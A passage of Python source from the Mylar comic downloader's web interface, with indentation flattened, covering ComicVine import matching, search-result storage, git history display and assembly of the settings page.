sresults = mb.findComic(searchterm, mode, issue=numissues, limityear=yearRANGE) #ogcname, mode, issue=numissues, limityear=yearRANGE, explicit='all') #ComicName, mode, issue=numissues, limityear=yearRANGE)
except TypeError:
logger.warn('[IMPORT] ComicVine API limit has been reached, and/or the ComicVine website is not responding. Aborting the process at this time - try again in ~1 hour when the API limit has reset.')
break
else:
if sresults is False:
sresults = []
type='comic'
#we now need to cycle through the results until we get a hit on both dynamicname AND year (~count of issues possibly).
logger.fdebug('[IMPORT] [%s] search results' % len(sresults))
search_matches = []
for results in sresults:
rsn = filechecker.FileChecker()
rsn_run = rsn.dynamic_replace(results['name'])
result_name = rsn_run['mod_seriesname']
result_comicid = results['comicid']
result_year = results['comicyear']
if float(int(results['issues']) / 12):
totalissues = (int(results['issues']) / 12) + 1
else:
totalissues = int(results['issues']) / 12
totalyear_range = int(result_year) + totalissues #2000 + (101 / 12) 2000 +8.4 = 2008
logger.fdebug('[IMPORT] [%s] Comparing: %s - TO - %s' % (totalyear_range, re.sub('[\|\s]', '', DynamicName.lower()).strip(), re.sub('[\|\s]', '', result_name.lower()).strip()))
if any([str(totalyear_range) in results['seriesrange'], result_year in results['seriesrange']]):
logger.fdebug('[IMPORT] LastIssueID: %s' % results['lastissueid'])
if re.sub('[\|\s]', '', DynamicName.lower()).strip() == re.sub('[\|\s]', '', result_name.lower()).strip():
logger.fdebug('[IMPORT MATCH] %s (%s)' % (result_name, result_comicid))
search_matches.append({'comicid': results['comicid'],
'series': results['name'],
'dynamicseries': result_name,
'seriesyear': result_year,
'publisher': results['publisher'],
'haveit': results['haveit'],
'name': results['name'],
'deck': results['deck'],
'url': results['url'],
'description': results['description'],
'comicimage': results['comicimage'],
'issues': results['issues'],
'ogcname': ogcname,
'comicyear': results['comicyear']})
if len(search_matches) == 1:
sr = search_matches[0]
logger.info('[IMPORT] There is only one result...automagik-mode enabled for %s :: %s' % (sr['series'], sr['comicid']))
resultset = 1
else:
if len(search_matches) == 0:
logger.fdebug("[IMPORT] no results, removing the year from the agenda and re-querying.")
sresults = mb.findComic(searchterm, mode, issue=numissues) #ComicName, mode, issue=numissues)
logger.fdebug('[IMPORT] [%s] search results' % len(sresults))
for results in sresults:
rsn = filechecker.FileChecker()
rsn_run = rsn.dynamic_replace(results['name'])
result_name = rsn_run['mod_seriesname']
result_comicid = results['comicid']
result_year = results['comicyear']
if float(int(results['issues']) / 12):
totalissues = (int(results['issues']) / 12) + 1
else:
totalissues = int(results['issues']) / 12
totalyear_range = int(result_year) + totalissues #2000 + (101 / 12) 2000 +8.4 = 2008
logger.fdebug('[IMPORT][%s] Comparing: %s - TO - %s' % (totalyear_range, re.sub('[\|\s]', '', DynamicName.lower()).strip(), re.sub('[\|\s]', '', result_name.lower()).strip()))
if any([str(totalyear_range) in results['seriesrange'], result_year in results['seriesrange']]):
if re.sub('[\|\s]', '', DynamicName.lower()).strip() == re.sub('[\|\s]', '', result_name.lower()).strip():
logger.fdebug('[IMPORT MATCH] %s (%s)' % (result_name, result_comicid))
search_matches.append({'comicid': results['comicid'],
'series': results['name'],
'dynamicseries': result_name,
'seriesyear': result_year,
'publisher': results['publisher'],
'haveit': results['haveit'],
'name': results['name'],
'deck': results['deck'],
'url': results['url'],
'description': results['description'],
'comicimage': results['comicimage'],
'issues': results['issues'],
'ogcname': ogcname,
'comicyear': results['comicyear']})
if len(search_matches) == 1:
sr = search_matches[0]
logger.info('[IMPORT] There is only one result...automagik-mode enabled for %s :: %s' % (sr['series'], sr['comicid']))
resultset = 1
else:
resultset = 0
else:
logger.info('[IMPORT] Returning results to Select option - there are %s possibilities, manual intervention required.' % len(search_matches))
resultset = 0
#generate random Search Results ID to allow for easier access for viewing logs / search results.
import random
SRID = str(random.randint(100000, 999999))
#link the SRID to the series that was just imported so that it can reference the search results when requested.
if volume is None or volume == 'None':
ctrlVal = {"DynamicName": DynamicName}
else:
ctrlVal = {"DynamicName": DynamicName,
"Volume": volume}
if len(sresults) > 1 or len(search_matches) > 1:
newVal = {"SRID": SRID,
"Status": 'Manual Intervention',
"ComicName": ComicName}
else:
newVal = {"SRID": SRID,
"Status": 'Importing',
"ComicName": ComicName}
myDB.upsert("importresults", newVal, ctrlVal)
if resultset == 0:
if len(search_matches) > 1:
# if we matched on more than one series above, just save those results instead of the entire search result set.
for sres in search_matches:
if type(sres['haveit']) == dict:
imp_cid = sres['haveit']['comicid']
else:
imp_cid = sres['haveit']
cVal = {"SRID": SRID,
"comicid": sres['comicid']}
#should store ogcname in here somewhere to account for naming conversions above.
nVal = {"Series": ComicName,
"results": len(search_matches),
"publisher": sres['publisher'],
"haveit": imp_cid,
"name": sres['name'],
"deck": sres['deck'],
"url": sres['url'],
"description": sres['description'],
"comicimage": sres['comicimage'],
"issues": sres['issues'],
"ogcname": ogcname,
"comicyear": sres['comicyear']}
#logger.fdebug('search_values: [%s]/%s' % (cVal, nVal))
myDB.upsert("searchresults", nVal, cVal)
logger.info('[IMPORT] There is more than one result that might be valid - normally this is due to the filename(s) not having enough information for me to use (ie. no volume label/year). Manual intervention is required.')
#force the status here just in case
newVal = {'SRID': SRID,
'Status': 'Manual Intervention'}
myDB.upsert("importresults", newVal, ctrlVal)
elif len(sresults) > 1:
# store the search results for series that returned more than one result for user to select later / when they want.
# should probably assign some random numeric for an id to reference back at some point.
for sres in sresults:
if type(sres['haveit']) == dict:
imp_cid = sres['haveit']['comicid']
else:
imp_cid = sres['haveit']
cVal = {"SRID": SRID,
"comicid": sres['comicid']}
#should store ogcname in here somewhere to account for naming conversions above.
nVal = {"Series": ComicName,
"results": len(sresults),
"publisher": sres['publisher'],
"haveit": imp_cid,
"name": sres['name'],
"deck": sres['deck'],
"url": sres['url'],
"description": sres['description'],
"comicimage": sres['comicimage'],
"issues": sres['issues'],
"ogcname": ogcname,
"comicyear": sres['comicyear']}
myDB.upsert("searchresults", nVal, cVal)
logger.info('[IMPORT] There is more than one result that might be valid - normally this is due to the filename(s) not having enough information for me to use (ie. no volume label/year). Manual intervention is required.')
#force the status here just in case
newVal = {'SRID': SRID,
'Status': 'Manual Intervention'}
myDB.upsert("importresults", newVal, ctrlVal)
else:
logger.info('[IMPORT] Could not find any matching results against CV. Check the logs and perhaps rename the attempted file(s)')
newVal = {'SRID': SRID,
'Status': 'No Results'}
myDB.upsert("importresults", newVal, ctrlVal)
else:
logger.info('[IMPORT] Now adding %s...' % ComicName)
if volume is None or volume == 'None':
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume IS NULL",[DynamicName])
else:
if not volume.lower().startswith('v'):
volume = 'v' + str(volume)
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume=?",[DynamicName,volume])
files = []
for result in results:
files.append({'comicfilename': result['ComicFilename'],
'comiclocation': result['ComicLocation'],
'issuenumber': result['IssueNumber'],
'import_id': result['impID']})
imported = {'ComicName': ComicName,
'DynamicName': DynamicName,
'Volume': volume,
'filelisting': files,
'srid': SRID}
self.addbyid(sr['comicid'], calledby=True, imported=imported, ogcname=ogcname, nothread=True)
mylar.IMPORTLOCK = False
logger.info('[IMPORT] Import completed.')
preSearchit.exposed = True
def importresults_popup(self, SRID, ComicName, imported=None, ogcname=None, DynamicName=None, Volume=None):
myDB = db.DBConnection()
resultset = myDB.select("SELECT * FROM searchresults WHERE SRID=?", [SRID])
if not resultset:
logger.warn('There are no search results to view for this entry ' + ComicName + ' [' + str(SRID) + ']. Something is probably wrong.')
raise cherrypy.HTTPRedirect("importResults")
searchresults = resultset
if any([Volume is None, Volume == 'None']):
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume IS NULL",[DynamicName])
else:
if not Volume.lower().startswith('v'):
volume = 'v' + str(Volume)
else:
volume = Volume
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume=?",[DynamicName,volume])
files = []
for result in results:
files.append({'comicfilename': result['ComicFilename'],
'comiclocation': result['ComicLocation'],
'issuenumber': result['IssueNumber'],
'import_id': result['impID']})
imported = {'ComicName': ComicName,
'DynamicName': DynamicName,
'Volume': Volume,
'filelisting': files,
'srid': SRID}
return serve_template(templatename="importresults_popup.html", title="results", searchtext=ComicName, searchresults=searchresults, imported=imported)
importresults_popup.exposed = True
def pretty_git(self, br_history):
#in order to 'prettify' the history log for display, we need to break it down so it's line by line.
br_split = br_history.split("\n") #split it on each commit
commit = []
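#each history line is expected as: <hash> - <relative date> - <author> - <subject> (the git log --pretty format used in config()).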
for br in br_split:
commit_st = br.find('-')
commitno = br[:commit_st].strip()
time_end = br.find('-',commit_st+1)
time = br[commit_st+1:time_end].strip()
author_end = br.find('-', time_end+1)
author = br[time_end+1:author_end].strip()
desc = br[author_end+1:].strip()
if len(desc) > 103:
desc = '<span title="%s">%s...</span>' % (desc, desc[:103])
if author != 'evilhero':
pr_tag = True
dspline = '[%s][PR] %s {<span style="font-size:11px">%s/%s</span>}'
else:
pr_tag = False
dspline = '[%s] %s {<span style="font-size:11px">%s/%s</span>}'
commit.append(dspline % ("<a href='https://github.com/evilhero/mylar/commit/" + commitno + "'>"+commitno+"</a>", desc, time, author))
return '<br />\n'.join(commit)
pretty_git.exposed = True
#---
def config(self):
interface_dir = os.path.join(mylar.PROG_DIR, 'data/interfaces/')
interface_list = [name for name in os.listdir(interface_dir) if os.path.isdir(os.path.join(interface_dir, name))]
#----
# to be implemented in the future.
if mylar.INSTALL_TYPE == 'git':
try:
branch_history, err = mylar.versioncheck.runGit('log --encoding=UTF-8 --pretty=format:"%h - %cr - %an - %s" -n 5')
#here we pass the branch_history to the pretty_git module to break it down
if branch_history:
br_hist = self.pretty_git(branch_history)
try:
br_hist = u"" + br_hist.decode('utf-8')
except:
br_hist = br_hist
else:
br_hist = err
except Exception as e:
logger.fdebug('[ERROR] Unable to retrieve git revision history for some reason: %s' % e)
br_hist = 'This would be a nice place to see revision history...'
else:
br_hist = 'This would be a nice place to see revision history...'
#----
myDB = db.DBConnection()
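#gather library statistics (series/issue counts and total size on disk) for the stats pane on the config page.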
CCOMICS = myDB.select("SELECT COUNT(*) FROM comics")
CHAVES = myDB.select("SELECT COUNT(*) FROM issues WHERE Status='Downloaded' OR Status='Archived'")
CISSUES = myDB.select("SELECT COUNT(*) FROM issues")
CSIZE = myDB.select("select SUM(ComicSize) from issues where Status='Downloaded' or Status='Archived'")
COUNT_COMICS = CCOMICS[0][0]
COUNT_HAVES = CHAVES[0][0]
COUNT_ISSUES = CISSUES[0][0]
COUNT_SIZE = helpers.human_size(CSIZE[0][0])
CCONTCOUNT = 0
cti = helpers.havetotals()
for cchk in cti:
if cchk['recentstatus'] == 'Continuing':
CCONTCOUNT += 1
comicinfo = {"COUNT_COMICS": COUNT_COMICS,
"COUNT_HAVES": COUNT_HAVES,
"COUNT_ISSUES": COUNT_ISSUES,
"COUNT_SIZE": COUNT_SIZE,
"CCONTCOUNT": CCONTCOUNT}
DLPROVSTATS = myDB.select("SELECT Provider, COUNT(Provider) AS Frequency FROM Snatched WHERE Status = 'Snatched' AND Provider is NOT NULL GROUP BY Provider ORDER BY Frequency DESC")
freq = dict()
freq_tot = 0
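#aggregate snatch counts per provider, merging the 32P/KAT/Experimental and newznab naming variations.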
for row in DLPROVSTATS:
if any(['CBT' in row['Provider'], '32P' in row['Provider'], 'ComicBT' in row['Provider']]):
try:
tmpval = freq['32P']
freq.update({'32P': tmpval + row['Frequency']})
except:
freq.update({'32P': row['Frequency']})
elif 'KAT' in row['Provider']:
try:
tmpval = freq['KAT']
freq.update({'KAT': tmpval + row['Frequency']})
except:
freq.update({'KAT': row['Frequency']})
elif 'experimental' in row['Provider']:
try:
tmpval = freq['Experimental']
freq.update({'Experimental': tmpval + row['Frequency']})
except:
freq.update({'Experimental': row['Frequency']})
elif [True for x in freq if re.sub("\(newznab\)", "", str(row['Provider'])).strip() in x]:
try:
tmpval = freq[re.sub("\(newznab\)", "", row['Provider']).strip()]
freq.update({re.sub("\(newznab\)", "", row['Provider']).strip(): tmpval + row['Frequency']})
except:
freq.update({re.sub("\(newznab\)", "", row['Provider']).strip(): row['Frequency']})
else:
freq.update({re.sub("\(newznab\)", "", row['Provider']).strip(): row['Frequency']})
freq_tot += row['Frequency']
dlprovstats = sorted(freq.iteritems(), key=itemgetter(1), reverse=True)
if mylar.SCHED_RSS_LAST is None:
rss_sclast = 'Unknown'
else:
rss_sclast = datetime.datetime.fromtimestamp(mylar.SCHED_RSS_LAST).replace(microsecond=0)
config = {
"comicvine_api": mylar.CONFIG.COMICVINE_API,
"http_host": mylar.CONFIG.HTTP_HOST,
"http_user": mylar.CONFIG.HTTP_USERNAME,
"http_port": mylar.CONFIG.HTTP_PORT,
"http_pass": mylar.CONFIG.HTTP_PASSWORD,
"enable_https": helpers.checked(mylar.CONFIG.ENABLE_HTTPS),
"https_cert": mylar.CONFIG.HTTPS_CERT,
"https_key": mylar.CONFIG.HTTPS_KEY,
"authentication": int(mylar.CONFIG.AUTHENTICATION),
"api_enabled": helpers.checked(mylar.CONFIG.API_ENABLED),
"api_key": mylar.CONFIG.API_KEY,
"launch_browser": helpers.checked(mylar.CONFIG.LAUNCH_BROWSER),
"auto_update": helpers.checked(mylar.CONFIG.AUTO_UPDATE),
"max_logsize": mylar.CONFIG.MAX_LOGSIZE,
"annuals_on": helpers.checked(mylar.CONFIG.ANNUALS_ON),
"enable_check_folder": helpers.checked(mylar.CONFIG.ENABLE_CHECK_FOLDER),
"check_folder": mylar.CONFIG.CHECK_FOLDER,
"download_scan_interval": mylar.CONFIG.DOWNLOAD_SCAN_INTERVAL,
"search_interval": mylar.CONFIG.SEARCH_INTERVAL,
"nzb_startup_search": helpers.checked(mylar.CONFIG.NZB_STARTUP_SEARCH),
"search_delay": mylar.CONFIG.SEARCH_DELAY,
"nzb_downloader_sabnzbd": helpers.radio(mylar.CONFIG.NZB_DOWNLOADER, 0),
"nzb_downloader_nzbget": helpers.radio(mylar.CONFIG.NZB_DOWNLOADER, 1),
"nzb_downloader_blackhole": helpers.radio(mylar.CONFIG.NZB_DOWNLOADER, 2),
"sab_host": mylar.CONFIG.SAB_HOST,
"sab_user": mylar.CONFIG.SAB_USERNAME,
"sab_api": mylar.CONFIG.SAB_APIKEY,
"sab_pass": mylar.CONFIG.SAB_PASSWORD,
"sab_cat": mylar.CONFIG.SAB_CATEGORY,
"sab_priority": mylar.CONFIG.SAB_PRIORITY,
"sab_directory": mylar.CONFIG.SAB_DIRECTORY,
"sab_to_mylar": helpers.checked(mylar.CONFIG.SAB_TO_MYLAR),
"sab_version": mylar.CONFIG.SAB_VERSION,
"sab_client_post_processing": helpers.checked(mylar.CONFIG.SAB_CLIENT_POST_PROCESSING),
"nzbget_host": mylar.CONFIG.NZBGET_HOST,
"nzbget_port": mylar.CONFIG.NZBGET_PORT,
"nzbget_user": mylar.CONFIG.NZBGET_USERNAME,
"nzbget_pass": mylar.CONFIG.NZBGET_PASSWORD,
"nzbget_cat": mylar.CONFIG.NZBGET_CATEGORY,
"nzbget_priority": mylar.CONFIG.NZBGET_PRIORITY,
"nzbget_directory": mylar.CONFIG.NZBGET_DIRECTORY,
"nzbget_client_post_processing": helpers.checked(mylar.CONFIG.NZBGET_CLIENT_POST_PROCESSING),
"torrent_downloader_watchlist": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 0),
"torrent_downloader_utorrent": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 1),
"torrent_downloader_rtorrent": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 2),
"torrent_downloader_transmission": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 3),
"torrent_downloader_deluge": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 4),
"torrent_downloader_qbittorrent": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 5),
"utorrent_host": mylar.CONFIG.UTORRENT_HOST,
"utorrent_username": mylar.CONFIG.UTORRENT_USERNAME,
"utorrent_password": mylar.CONFIG.UTORRENT_PASSWORD,
"utorrent_label": mylar.CONFIG.UTORRENT_LABEL,
"rtorrent_host": mylar.CONFIG.RTORRENT_HOST,
"rtorrent_rpc_url": mylar.CONFIG.RTORRENT_RPC_URL,
"rtorrent_authentication": mylar.CONFIG.RTORRENT_AUTHENTICATION,
"rtorrent_ssl": helpers.checked(mylar.CONFIG.RTORRENT_SSL),
"rtorrent_verify": helpers.checked(mylar.CONFIG.RTORRENT_VERIFY),
"rtorrent_username": mylar.CONFIG.RTORRENT_USERNAME,
"rtorrent_password": mylar.CONFIG.RTORRENT_PASSWORD,
"rtorrent_directory": mylar.CONFIG.RTORRENT_DIRECTORY,
"rtorrent_label": mylar.CONFIG.RTORRENT_LABEL,
"rtorrent_startonload": helpers.checked(mylar.CONFIG.RTORRENT_STARTONLOAD),
"transmission_host": mylar.CONFIG.TRANSMISSION_HOST,
"transmission_username": mylar.CONFIG.TRANSMISSION_USERNAME,
"transmission_password": mylar.CONFIG.TRANSMISSION_PASSWORD,
"transmission_directory": mylar.CONFIG.TRANSMISSION_DIRECTORY,
"deluge_host": mylar.CONFIG.DELUGE_HOST,
"deluge_username": mylar.CONFIG.DELUGE_USERNAME,
"deluge_password": mylar.CONFIG.DELUGE_PASSWORD,
"deluge_label": mylar.CONFIG.DELUGE_LABEL,
"deluge_pause": helpers.checked(mylar.CONFIG.DELUGE_PAUSE),
"deluge_download_directory": mylar.CONFIG.DELUGE_DOWNLOAD_DIRECTORY,
"deluge_done_directory": mylar.CONFIG.DELUGE_DONE_DIRECTORY,
"qbittorrent_host": mylar.CONFIG.QBITTORRENT_HOST,
"qbittorrent_username": mylar.CONFIG.QBITTORRENT_USERNAME,
"qbittorrent_password": mylar.CONFIG.QBITTORRENT_PASSWORD,
"qbittorrent_label": mylar.CONFIG.QBITTORRENT_LABEL,
"qbittorrent_folder": mylar.CONFIG.QBITTORRENT_FOLDER,
"qbittorrent_loadaction": mylar.CONFIG.QBITTORRENT_LOADACTION,
"blackhole_dir": mylar.CONFIG.BLACKHOLE_DIR,
"usenet_retention": mylar.CONFIG.USENET_RETENTION,
"nzbsu": helpers.checked(mylar.CONFIG.NZBSU),
"nzbsu_uid": mylar.CONFIG.NZBSU_UID,
"nzbsu_api": mylar.CONFIG.NZBSU_APIKEY,
"nzbsu_verify": helpers.checked(mylar.CONFIG.NZBSU_VERIFY),
"dognzb": helpers.checked(mylar.CONFIG.DOGNZB),
"dognzb_api": mylar.CONFIG.DOGNZB_APIKEY,
"dognzb_verify": helpers.checked(mylar.CONFIG.DOGNZB_VERIFY),
"experimental": helpers.checked(mylar.CONFIG.EXPERIMENTAL),
"enable_torznab": helpers.checked(mylar.CONFIG.ENABLE_TORZNAB),
"extra_torznabs": sorted(mylar.CONFIG.EXTRA_TORZNABS, key=itemgetter(5), reverse=True),
"newznab": helpers.checked(mylar.CONFIG.NEWZNAB),
"extra_newznabs": sorted(mylar.CONFIG.EXTRA_NEWZNABS, key=itemgetter(5), reverse=True),
"enable_ddl": helpers.checked(mylar.CONFIG.ENABLE_DDL),
"enable_rss": helpers.checked(mylar.CONFIG.ENABLE_RSS),
"rss_checkinterval": mylar.CONFIG.RSS_CHECKINTERVAL,
"rss_last": rss_sclast,
"provider_order": mylar.CONFIG.PROVIDER_ORDER,
"enable_torrents": helpers.checked(mylar.CONFIG.ENABLE_TORRENTS),
"minseeds": mylar.CONFIG.MINSEEDS,
"torrent_local": helpers.checked(mylar.CONFIG.TORRENT_LOCAL),
"local_watchdir": mylar.CONFIG.LOCAL_WATCHDIR,
"torrent_seedbox": helpers.checked(mylar.CONFIG.TORRENT_SEEDBOX),
"seedbox_watchdir": mylar.CONFIG.SEEDBOX_WATCHDIR,
"seedbox_host": mylar.CONFIG.SEEDBOX_HOST,
"seedbox_port": mylar.CONFIG.SEEDBOX_PORT,
"seedbox_user": mylar.CONFIG.SEEDBOX_USER,
"seedbox_pass": mylar.CONFIG.SEEDBOX_PASS,
"enable_torrent_search": helpers.checked(mylar.CONFIG.ENABLE_TORRENT_SEARCH),
"enable_public": helpers.checked(mylar.CONFIG.ENABLE_PUBLIC),
"enable_32p": helpers.checked(mylar.CONFIG.ENABLE_32P),
"legacymode_32p": helpers.radio(mylar.CONFIG.MODE_32P, 0),
"authmode_32p": helpers.radio(mylar.CONFIG.MODE_32P, 1),
"rssfeed_32p": mylar.CONFIG.RSSFEED_32P,
"passkey_32p": mylar.CONFIG.PASSKEY_32P,
"username_32p": mylar.CONFIG.USERNAME_32P,
"password_32p": mylar.CONFIG.PASSWORD_32P,
"snatchedtorrent_notify": helpers.checked(mylar.CONFIG.SNATCHEDTORRENT_NOTIFY),
"destination_dir": mylar.CONFIG.DESTINATION_DIR,
"create_folders": helpers.checked(mylar.CONFIG.CREATE_FOLDERS),
"enforce_perms": helpers.checked(mylar.CONFIG.ENFORCE_PERMS),
"chmod_dir": mylar.CONFIG.CHMOD_DIR,
"chmod_file": mylar.CONFIG.CHMOD_FILE,
"chowner": mylar.CONFIG.CHOWNER,
"chgroup": mylar.CONFIG.CHGROUP,
"replace_spaces": helpers.checked(mylar.CONFIG.REPLACE_SPACES),
"replace_char": mylar.CONFIG.REPLACE_CHAR,
"use_minsize": helpers.checked(mylar.CONFIG.USE_MINSIZE),
"minsize": mylar.CONFIG.MINSIZE,
"use_maxsize": helpers.checked(mylar.CONFIG.USE_MAXSIZE),
"maxsize": mylar.CONFIG.MAXSIZE,
"interface_list": interface_list,
"dupeconstraint": mylar.CONFIG.DUPECONSTRAINT,
"ddump": helpers.checked(mylar.CONFIG.DDUMP),
"duplicate_dump": mylar.CONFIG.DUPLICATE_DUMP,
"autowant_all": helpers.checked(mylar.CONFIG.AUTOWANT_ALL),
"autowant_upcoming": helpers.checked(mylar.CONFIG.AUTOWANT_UPCOMING),
"comic_cover_local": helpers.checked(mylar.CONFIG.COMIC_COVER_LOCAL),
"alternate_latest_series_covers": helpers.checked(mylar.CONFIG.ALTERNATE_LATEST_SERIES_COVERS),
"pref_qual_0": helpers.radio(int(mylar.CONFIG.PREFERRED_QUALITY), 0),
"pref_qual_1": helpers.radio(int(mylar.CONFIG.PREFERRED_QUALITY), 1),
"pref_qual_2": helpers.radio(int(mylar.CONFIG.PREFERRED_QUALITY), 2),
"move_files": helpers.checked(mylar.CONFIG.MOVE_FILES),
"rename_files": helpers.checked(mylar.CONFIG.RENAME_FILES),
"folder_format": mylar.CONFIG.FOLDER_FORMAT,
"file_format": mylar.CONFIG.FILE_FORMAT,
"zero_level": helpers.checked(mylar.CONFIG.ZERO_LEVEL),
"zero_level_n": mylar.CONFIG.ZERO_LEVEL_N,
"add_to_csv": helpers.checked(mylar.CONFIG.ADD_TO_CSV),
"cvinfo": helpers.checked(mylar.CONFIG.CVINFO),
"lowercase_filenames": helpers.checked(mylar.CONFIG.LOWERCASE_FILENAMES),
"syno_fix": helpers.checked(mylar.CONFIG.SYNO_FIX),
"prowl_enabled": helpers.checked(mylar.CONFIG.PROWL_ENABLED),
"prowl_onsnatch": helpers.checked(mylar.CONFIG.PROWL_ONSNATCH),
"prowl_keys": mylar.CONFIG.PROWL_KEYS,
"prowl_priority": mylar.CONFIG.PROWL_PRIORITY,
"pushover_enabled": helpers.checked(mylar.CONFIG.PUSHOVER_ENABLED),
"pushover_onsnatch": helpers.checked(mylar.CONFIG.PUSHOVER_ONSNATCH),
"pushover_apikey": mylar.CONFIG.PUSHOVER_APIKEY,
"pushover_userkey": mylar.CONFIG.PUSHOVER_USERKEY,
"pushover_device": mylar.CONFIG.PUSHOVER_DEVICE,
"pushover_priority": mylar.CONFIG.PUSHOVER_PRIORITY,
"boxcar_enabled": helpers.checked(mylar.CONFIG.BOXCAR_ENABLED),
"boxcar_onsnatch": helpers.checked(mylar.CONFIG.BOXCAR_ONSNATCH),
"boxcar_token": mylar.CONFIG.BOXCAR_TOKEN,
"pushbullet_enabled": helpers.checked(mylar.CONFIG.PUSHBULLET_ENABLED),
"pushbullet_onsnatch": helpers.checked(mylar.CONFIG.PUSHBULLET_ONSNATCH),
"pushbullet_apikey": mylar.CONFIG.PUSHBULLET_APIKEY,
"pushbullet_deviceid": mylar.CONFIG.PUSHBULLET_DEVICEID,
"pushbullet_channel_tag": mylar.CONFIG.PUSHBULLET_CHANNEL_TAG,
"telegram_enabled": helpers.checked(mylar.CONFIG.TELEGRAM_ENABLED),
"telegram_onsnatch": helpers.checked(mylar.CONFIG.TELEGRAM_ONSNATCH),
"telegram_token": mylar.CONFIG.TELEGRAM_TOKEN,
"telegram_userid": mylar.CONFIG.TELEGRAM_USERID,
"slack_enabled": helpers.checked(mylar.CONFIG.SLACK_ENABLED),
"slack_webhook_url": mylar.CONFIG.SLACK_WEBHOOK_URL,
"slack_onsnatch": helpers.checked(mylar.CONFIG.SLACK_ONSNATCH),
"email_enabled": helpers.checked(mylar.CONFIG.EMAIL_ENABLED),
"email_from": mylar.CONFIG.EMAIL_FROM,
"email_to": mylar.CONFIG.EMAIL_TO,
"email_server": mylar.CONFIG.EMAIL_SERVER,
"email_user": mylar.CONFIG.EMAIL_USER,
"email_password": mylar.CONFIG.EMAIL_PASSWORD,
"email_port": int(mylar.CONFIG.EMAIL_PORT),
"email_raw": helpers.radio(int(mylar.CONFIG.EMAIL_ENC), 0),
"email_ssl": helpers.radio(int(mylar.CONFIG.EMAIL_ENC), 1),
"email_tls": helpers.radio(int(mylar.CONFIG.EMAIL_ENC), 2),
"email_ongrab": helpers.checked(mylar.CONFIG.EMAIL_ONGRAB),
"email_onpost": helpers.checked(mylar.CONFIG.EMAIL_ONPOST),
"enable_extra_scripts": helpers.checked(mylar.CONFIG.ENABLE_EXTRA_SCRIPTS),
"extra_scripts": mylar.CONFIG.EXTRA_SCRIPTS,
"enable_snatch_script": helpers.checked(mylar.CONFIG.ENABLE_SNATCH_SCRIPT),
"snatch_script": mylar.CONFIG.SNATCH_SCRIPT,
"enable_pre_scripts": helpers.checked(mylar.CONFIG.ENABLE_PRE_SCRIPTS),
"pre_scripts": mylar.CONFIG.PRE_SCRIPTS,
"post_processing": helpers.checked(mylar.CONFIG.POST_PROCESSING),
"file_opts": mylar.CONFIG.FILE_OPTS,
"enable_meta": helpers.checked(mylar.CONFIG.ENABLE_META),
"cbr2cbz_only": helpers.checked(mylar.CONFIG.CBR2CBZ_ONLY),
"cmtagger_path": mylar.CONFIG.CMTAGGER_PATH,
"ct_tag_cr": helpers.checked(mylar.CONFIG.CT_TAG_CR),
"ct_tag_cbl": helpers.checked(mylar.CONFIG.CT_TAG_CBL),
"ct_cbz_overwrite": helpers.checked(mylar.CONFIG.CT_CBZ_OVERWRITE),
"unrar_cmd": mylar.CONFIG.UNRAR_CMD,
"failed_download_handling": helpers.checked(mylar.CONFIG.FAILED_DOWNLOAD_HANDLING),
"failed_auto": helpers.checked(mylar.CONFIG.FAILED_AUTO),
"branch": mylar.CONFIG.GIT_BRANCH,
"br_type": mylar.INSTALL_TYPE,
"br_version": mylar.versioncheck.getVersion()[0],
"py_version": platform.python_version(),
"data_dir": mylar.DATA_DIR,
"prog_dir": mylar.PROG_DIR,
"cache_dir": mylar.CONFIG.CACHE_DIR,
"config_file": mylar.CONFIG_FILE,
"lang": '%s.%s' % (logger.LOG_LANG,logger.LOG_CHARSET),
"branch_history" : br_hist,
"log_dir": mylar.CONFIG.LOG_DIR,
"opds_enable": helpers.checked(mylar.CONFIG.OPDS_ENABLE),
"opds_authentication": helpers.checked(mylar.CONFIG.OPDS_AUTHENTICATION),
"opds_username": mylar.CONFIG.OPDS_USERNAME,
"opds_password": mylar.CONFIG.OPDS_PASSWORD,
"opds_metainfo": helpers.checked(mylar.CONFIG.OPDS_METAINFO),
"opds_pagesize": mylar.CONFIG.OPDS_PAGESIZE,
"dlstats": dlprovstats,
"dltotals": freq_tot,
"alphaindex": mylar.CONFIG.ALPHAINDEX
}
return serve_template(templatename="config.html", title="Settings", config=config, comicinfo=comicinfo)
config.exposed = True
def error_change(self, comicid, errorgcd, comicname, comicyear, imported=None, mogcname=None):
# if comicname contains a "," it will break the exceptions import.
import urllib
b = urllib.unquote_plus(comicname)
# cname = b.decode("utf-8")
cname = b.encode('utf-8')
cname = re.sub("\,", "", cname)
if mogcname != None:
c = urllib.unquote_plus(mogcname)
ogcname = c.encode('utf-8')
else:
ogcname = None
if errorgcd[:5].isdigit():
logger.info("GCD-ID detected : " + str(errorgcd)[:5])
logger.info("ogcname: " + str(ogcname))
logger.info("I'm assuming you know what you're doing - going to force-match for " + cname)
self.from_Exceptions(comicid=comicid, gcdid=errorgcd, comicname=cname, comicyear=comicyear, imported=imported, ogcname=ogcname)
else:
logger.info("Assuming rewording of Comic - adjusting to : " + str(errorgcd))
Err_Info = mylar.cv.getComic(comicid, 'comic')
self.addComic(comicid=comicid, comicname=str(errorgcd), comicyear=Err_Info['ComicYear'], comicissues=Err_Info['ComicIssues'], comicpublisher=Err_Info['ComicPublisher'])
error_change.exposed = True
def manual_annual_add(self, manual_comicid, comicname, comicyear, comicid, x=None, y=None):
import urllib
b = urllib.unquote_plus(comicname)
cname = b.encode('utf-8')
logger.fdebug('comicid to be attached : ' + str(manual_comicid))
logger.fdebug('comicname : ' + str(cname))
logger.fdebug('comicyear : ' + str(comicyear))
logger.fdebug('comicid : ' + str(comicid))
issueid = manual_comicid
logger.fdebug('I will be adding ' + str(issueid) + ' to the Annual list for this series.')
threading.Thread(target=importer.manualAnnual, args=[manual_comicid, cname, comicyear, comicid]).start()
